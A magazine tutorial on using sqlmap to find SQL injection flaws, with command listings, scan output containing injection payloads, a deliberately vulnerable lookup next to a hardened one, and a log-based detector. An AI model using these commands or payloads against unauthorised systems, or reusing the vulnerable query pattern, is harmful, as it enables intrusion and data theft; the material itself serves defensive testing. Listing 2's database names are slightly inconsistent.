Using sqlmap to discover SQL vulnerabilities

The Tester

Article from Issue 173/2015

SQL injection is a big problem on the Internet. The handy sqlmap utility will tell you if you need to worry about an SQL attack in your own web environment.

SQL injection is one of the most common forms of network intrusion. An SQL injection attack typically exploits a problem in the SQL code – for instance, incorrect filtering for string literal escape characters or insufficient type checking. If you watch the Common Vulnerabilities and Exposures website [1], you'll see that new SQL injection attacks are discovered every week.

Software developers and Linux distribution maintainers are constantly watching for new SQL injection problems, which are often fixed through a security patch. However, many potential problems fall through the cracks – either on the development side or because a busy webmaster doesn't have time to install every patch and upgrade every system.

More importantly, some attack vectors haven't been discovered or adapted yet, so even if you do your best to keep your own systems up to date, it is still a good idea to look for potential problems yourself.

Most SQL injection attacks, however, require artificial, carefully crafted, and totally un-intuitive input. In other words, you almost have to be an expert to watch the security alerts and recreate every potential SQL attack on your own. Luckily, the security-minded admin can turn to a tool called sqlmap [2] to check for vulnerabilities in network-based SQL systems.

Sqlmap is an SQL-focused penetration testing tool that includes several useful options for discovering and attacking a SQL database. The easiest way to obtain sqlmap is to install or Live-boot a pen-testing Linux distro that comes with sqlmap pre-installed. In this article, I'll start up sqlmap from the Kali Linux Live system [3]. Kali is a Linux distribution specializing in security tools to assist in penetration testing, vulnerability detection, forensics, and other security-related tasks. You could also look for sqlmap in your Linux distro's package repositories, or you could download the source code from the sqlmap project website.

Sqlmap supports a number of database alternatives, including MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, and more. The sqlmap tool comes with automatic recognition of password hash formats and built-in support for dictionary attacks to crack passwords. Advanced features let you dump a complete database file, download and upload files to the database server, and even engage in privilege escalation using Metasploit's Meterpreter tool.

The Kali distro weighs in at less than 3GB and is available as a direct ISO download or torrent feed [4]. Kali is available in 32- and 64-bit versions for Intel processors and is also available for ARM processors. Kali supports forensic modes, USB, and straight installs. In this article, we describe how to improve your network's security using Kali Linux. If you decide to use Kali for your pen testing, see the Kali documentation at the project website [5] for more on getting a system up and running.

SQL Injection

SQL injection refers to methods that make a database server run SQL commands that were not intended by the application developer. Although vulnerability tools can usually find SQL vulnerabilities easily, some users might not realize their data is vulnerable. The steps described in this article can help you determine whether your data is susceptible to theft or compromise using SQL injection.
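To make the root causes named in the introduction (missing escaping and missing type checks) concrete, here is an added example that is not part of the article: a looky.php-style lookup in Python against an in-memory SQLite database standing in for the MySQL server, written once the vulnerable way (the parameter is pasted into the SQL text) and once hardened (type-checked and bound). The clients table and its rows are constructed for the demonstration.

```python
import sqlite3

# Constructed stand-in for the 'clients' database behind looky.php (assumed schema).
SAMPLE_ROWS = [(1, "Acme", "acme@example.com"), (2, "Globex", "globex@example.com")]


def make_db():
    """In-memory SQLite database holding the assumed clients table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE clients (id INTEGER, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO clients VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, raw_id):
    """The pattern sqlmap exploits: the request parameter becomes part of the SQL text."""
    sql = "SELECT id, name, email FROM clients WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, raw_id):
    """Type-check the input, then bind it so the database never parses it as SQL."""
    try:
        id_value = int(raw_id)
    except ValueError:
        raise ValueError("id must be an integer") from None
    sql = "SELECT id, name, email FROM clients WHERE id = ?"
    return conn.execute(sql, (id_value,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Boolean-based blind probe from Listing 1: a true condition leaves the row in place ...
    print(lookup_vulnerable(db, "1 AND 7449=7449"))   # [(1, 'Acme', 'acme@example.com')]
    # ... while a false one empties the result; that difference is the yes/no channel.
    print(lookup_vulnerable(db, "1 AND 7449=7450"))   # []
    # UNION probe with the 3 columns sqlmap counted: a row the developer never selected.
    print(lookup_vulnerable(db, "-7199 UNION ALL SELECT NULL,NULL,'injected'"))
    # The hardened version rejects anything that is not an integer before it reaches SQL.
    try:
        lookup_hardened(db, "1 AND 7449=7449")
    except ValueError as err:
        print("rejected:", err)
```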

Thanks to sqlmap, you can look for SQL problems without advanced understanding of SQL programming techniques.

Information Gathering

Sqlmap is ideal for identifying vulnerabilities specific to your particular database version without actually having to know how to inject SQL code.

To get started determining whether a server is susceptible to a SQL injection attack, use the -u parameter with the sqlmap command to specify the URL you want to test. The command in Listing 1 (line 1) launches a test for the URL http://www.internalserver.com/looky.php?id=1.

Listing 1

Looking for a Vulnerable Database System

01 root@kali:~# sqlmap -u http://www.internalserver.com/looky.php?id=1
02
03     sqlmap/1.0-dev - automatic SQL injection and database takeover tool
04     http://sqlmap.org
05
06 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior \
   mutual consent is illegal. It is the end user's responsibility to obey all \
   applicable local, state and federal laws. Developers assume no liability \
   and are not responsible for any misuse or damage caused by this program
07
08 [*] starting at 21:02:17
09
10 [21:02:17] [INFO] testing connection to the target URL
11 [21:02:18] [INFO] testing if the target URL is stable. \
   This can take a couple of seconds
12 [21:02:19] [INFO] target URL is stable
13 [21:02:19] [INFO] testing if GET parameter 'id' is dynamic
14 [21:02:20] [INFO] confirming that GET parameter 'id' is dynamic
15 [21:02:20] [INFO] GET parameter 'id' is dynamic
16 [21:02:21] [INFO] heuristic (basic) test shows that GET parameter \
  'id' might be injectable (possible DBMS: 'MySQL')
17 [21:02:21] [INFO] testing for SQL injection on GET parameter 'id'
18 heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. \
   Do you want to skip test payloads specific for other DBMSes? [Y/n] y
19 do you want to include all tests for 'MySQL' extending provided level \
   (1) and risk (1)? [Y/n] y
20 [21:02:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
21 [21:02:34] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - \
   WHERE or HAVING clause' injectable
22 [21:02:34] [INFO] testing 'MySQL >= 5.0 AND error-based - \
   WHERE or HAVING clause'
23 ...
24 [21:02:40] [INFO] testing 'MySQL > 5.0.11 stacked queries'
25 [21:02:40] [WARNING] time-based comparison requires larger statistical \
   model, please wait.......
26 [21:02:44] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
27 [21:02:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
28 [21:03:05] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 \
   AND time-based blind' injectable
29 [21:03:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
30 [21:03:06] [INFO] automatically extending ranges for UNION query injection \
   technique tests as there is at least one other (potential) technique found
31 [21:03:06] [INFO] ORDER BY technique seems to be usable. This should reduce \
   the time needed to find the right number of query columns. Automatically \
   extending the range for current UNION query injection technique test
32 [21:03:08] [INFO] target URL appears to have 3 columns in query
33 [21:03:10] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - \
   1 to 20 columns' injectable
34 GET parameter 'id' is vulnerable. Do you want to keep testing the others \
   (if any)? [y/N] y
35 sqlmap identified the following injection points with a total of 41 \
   HTTP(s) requests:
36 ---
37 Place: GET
38 Parameter: id
39     Type: boolean-based blind
40     Title: AND boolean-based blind - WHERE or HAVING clause
41     Payload: id=1 AND 7449=7449
42
43     Type: UNION query
44     Title: MySQL UNION query (NULL) - 3 columns
45     Payload: id=-7199 UNION ALL SELECT NULL,NULL,CONCAT\
       (0x7161636671,0x4e776b7a52554b486776,0x7167716571)#
46
47     Type: AND/OR time-based blind
48     Title: MySQL > 5.0.11 AND time-based blind
49     Payload: id=1 AND SLEEP(5)
50 ---
51 [21:03:18] [INFO] the back-end DBMS is MySQL
52 web application technology: Apache, PHP 5.3.29
53 back-end DBMS: MySQL 5.0.11
54 [21:03:18] [INFO] fetched data logged to text files under \
   '/usr/share/sqlmap/output/www.internalserver.com'
55
56 [*] shutting down at 21:03:18
57
58 root@kali:~#

Sqlmap launches into a series of tests to look for vulnerabilities. The output in Listing 1 shows that the tests reveal that the database is injectable. Line 33, for instance, states:

GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable

The tests in Listing 1 also reveal the database vendor and version: MySQL 5.0.11. As you can see in line 54, sqlmap saves the information it uncovers to a text file:

[21:03:18] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.internalserver.com'
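The three techniques sqlmap reported in Listing 1 (boolean tautology, UNION SELECT, SLEEP) leave recognisable traces in the web server's access log. As an added example that is not part of the article, this Python script decodes the query string of each request in a few constructed Apache combined-format log lines and flags those shapes, also noting whether the User-Agent looks like sqlmap's default (assumed here to begin with "sqlmap/").

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-format log lines (not from the article) replaying the
# payload shapes sqlmap reported in Listing 1, percent-encoded as they arrive on the wire.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2015:21:02:17 +0100] "GET /looky.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [12/Mar/2015:21:02:32 +0100] "GET /looky.php?id=1%20AND%207449%3D7449 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.5 - - [12/Mar/2015:21:03:06 +0100] "GET /looky.php?id=-7199%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7161636671%2C0x4e776b7a52554b486776%2C0x7167716571%29%23 HTTP/1.1" 200 600 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.5 - - [12/Mar/2015:21:02:45 +0100] "GET /looky.php?id=1%20AND%20SLEEP%285%29 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
10.0.0.9 - - [12/Mar/2015:21:05:00 +0100] "GET /looky.php?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# (technique name as sqlmap labels it, pattern applied to the decoded parameter value)
RULES = [
    ("boolean-based blind", re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*\2\b", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("time-based blind", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
]


def classify_value(value):
    """Names of the techniques whose signature appears in one decoded parameter value."""
    return [name for name, rx in RULES if rx.search(value)]


def scan_log(text):
    """One finding per request whose decoded query parameters match a rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in parse_qsl(urlsplit(m["path"]).query, keep_blank_values=True):
            techniques = classify_value(value)
            if techniques:
                findings.append({"ip": m["ip"], "time": m["ts"], "param": name,
                                 "techniques": techniques,
                                 "sqlmap_ua": m["ua"].startswith("sqlmap/")})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} param={f['param']} {f['techniques']} sqlmap_ua={f['sqlmap_ua']}")
```

Matching on the decoded value rather than the raw request line is what keeps percent-encoded probes such as `%20AND%207449%3D7449` from slipping past the rules.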

Identifying Databases

Now that I know the database is vulnerable, the next step is to determine which databases are running on the MySQL server by using sqlmap with the -u parameter and the --dbs parameter (Listing 2).

Listing 2

Getting the Database Names

01 root@kali:~# sqlmap -u http://internalserver.com/looky.php?id=1 --dbs
02
03     sqlmap/1.0-dev - automatic SQL injection and database takeover tool
04     http://sqlmap.org
05
06 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior \
   mutual consent is illegal. It is the end user's responsibility to obey all \
   applicable local, state and federal laws. Developers assume no liability \
   and are not responsible for any misuse or damage caused by this program
07
08 [*] starting at 21:07:29
09
10 [21:07:29] [INFO] resuming back-end DBMS 'mysql'
11 [21:07:29] [INFO] testing connection to the target URL
12 sqlmap identified the following injection points with a total of \
   0 HTTP(s) requests:
13 ---
14 Place: GET
15 Parameter: id
16     Type: boolean-based blind
17     Title: AND boolean-based blind - WHERE or HAVING clause
18     Payload: id=1 AND 7449=7449
19
20     Type: UNION query
21     Title: MySQL UNION query (NULL) - 3 columns
22     Payload: id=-7199 UNION ALL SELECT NULL,NULL,CONCAT\
       (0x7161636671,0x4e776b7a52554b486776,0x7167716571)#
23
24     Type: AND/OR time-based blind
25     Title: MySQL > 5.0.11 AND time-based blind
26     Payload: id=1 AND SLEEP(5)
27 ---
28 [21:07:30] [INFO] the back-end DBMS is MySQL
29 web application technology: Apache, PHP 5.3.29
30 back-end DBMS: MySQL 5.0.11
31 [21:07:30] [INFO] fetching database names
32 [21:07:35] [INFO] the SQL query used returns 2 entries
33 [21:07:35] [INFO] retrieved: "information"
34 [21:07:36] [INFO] retrieved: "clients"
35 available databases [2]:
36 [*] information
37 [*] internalserver.com
38
39 [21:07:36] [INFO] fetched data logged to text files under \
   '/usr/share/sqlmap/output/www.internalserver.com'
40
41 [*] shutting down at 21:07:36
42
43 root@kali:~#

The output following the query in Listing 2 reveals that the database server has two databases: information and clients (lines 33 and 34). At this point in the pen test, the database owner will hopefully start to understand that the system is indeed at risk of an SQL injection.
